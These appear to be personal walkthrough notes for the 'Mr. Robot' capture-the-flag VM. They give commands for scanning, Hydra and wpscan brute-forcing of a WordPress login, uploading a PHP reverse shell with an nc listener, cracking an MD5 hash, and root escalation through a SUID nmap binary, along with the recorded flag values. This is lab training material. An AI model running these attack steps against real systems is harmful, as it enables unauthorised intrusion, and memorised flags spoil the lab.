VM 4 - Mr. Robot
============ steps to follow ======================
netdiscover -r 192.168.239.133/24
nmap -sS -AT4 192.168.239.133 /OS and apps
nmap -sS -O -A -n 192.168.239.133
nikto -host 192.168.239.133 / Find apache details
enum4linux 192.168.239.133 / get more details
dirb http://192.168.239.133 / search the web server
192.168.239.133/robots.txt
got a dictionary
wc -l fsocity.dic / dictionary line count: 858160
sort -u fsocity.dic | wc -l / count of unique entries
sort -u fsocity.dic > newfsocity.dic / make a deduplicated dictionary (sort -u already drops duplicates, uniq is not needed)
--------------------------------------------------
bruteforce the wp-login.php using that wordlist
--------------------------------------------------
hydra -L newfsocity.dic -p whocares 192.168.239.133 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:invalid"
/ -L tries every entry of the wordlist as a username; -p sets one fixed dummy password (anything can be given), since this run only enumerates valid usernames
wpscan --url http://192.168.239.133/ --wordlist /root/Desktop/Pentest/newfsocity.dic --username Elliot
password: ER28-0652
Download the PHP reverse shell, set the listener IP/port, and upload it as a WordPress plugin
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
nc -v -n -l -p 4444 / start the listener in a terminal before triggering the shell
cd /home
c3fcd3d76192e4007dfb496cca67e13b --> md5 hash
abcdefghijklmnopqrstuvwxyz --> cracked (MD5 is a hash, so this is a lookup/crack, not a decryption)
python -c 'import pty; pty.spawn("/bin/bash")' / upgrade to an interactive TTY so that su works
su robot
abcdefghijklmnopqrstuvwxyz / password for robot
cd /home/robot
cat key-2-of-3.txt --> 822c73956184f694993bede3eb39f959
ls -alh / shows all permissions
find / -name key-3-of-3.txt / find the file; permission denied
find / -perm -4000 -type f 2>/dev/null / list SUID binaries
found: /usr/local/bin/nmap --> set-uid root, so it runs with root privileges
nmap --help
nmap --interactive
!sh / get shell access by typing "!" in the nmap interactive session
whoami / root
cd /root
ls
key-3-of-3.txt
cat key-3-of-3.txt